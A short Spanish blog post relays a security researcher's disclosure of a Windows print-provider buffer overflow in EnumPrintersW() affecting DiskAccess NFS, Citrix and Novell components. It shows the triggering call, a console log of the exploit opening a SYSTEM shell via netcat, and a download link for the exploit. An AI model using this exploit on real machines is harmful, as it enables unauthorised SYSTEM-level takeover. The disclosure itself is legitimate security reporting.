Con este título ha publicado Andrés Tarasco un interesante artículo en el que presenta un exploit universal para determinados proveedores de impresión en Windows que permite la ejecución de código con permiso de system en los siguientes productos:

• DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) – REPORTED & NOTFIXED -0day!!!
• Citrix Metaframe – cpprov.dll – FIXED
• Novell (nwspool.dll – CVE-2006-5854 – untested)

“ El problema está en una llamada a la función EnumPrintersW() utilizada para enumerar proveedores de impresión y/o impresoras. Al pasar una cadena larga en Unicode de más de 260 caracteres se produce el desbordamiento de buffer dado que el software supone que el tamaño de la cadena es 260 en vez de 260*2 (unicode). Este bug puede ser explotado local y remotamente aunque el exploit presentado aquí es local.

EnumPrintersW ( PRINTER_ENUM_NAME, L”AAAAAAA….AAAAAAA”, 1, NULL, 0, &dwSizeNeeded, &n );“

D:\Programación\EnumPrinters\Exploits>testlpc.exe
[+] Citrix Presentation Server – EnumPrinterW() Universal exploit
[+] Exploit coded by Andres Tarasco – atarasco@514.es

[+] Connecting to spooler LCP port \RPC Control\spoolss
[+] Trying to locate valid address (1 tries)
[+] Mapped memory. Client address: 0×003d0000
[+] Mapped memory. Server address: 0×00a70000
[+] Targeting return address to : 0×00A700A7
[+] Writting to shared memory…
[+] Written 0×1000 bytes
[+] Exploiting vulnerability….
[+] Exploit complete. Now Connect to 127.0.0.1:51477

D:\Programación\EnumPrinters>nc localhost 51477
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

Puedes leer la explicación detallada en:
http://www.514.es/2007/01/universal_exploit_for_vulnerab.html

Descarga el exploit:
http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip
Origen: http://www.514.es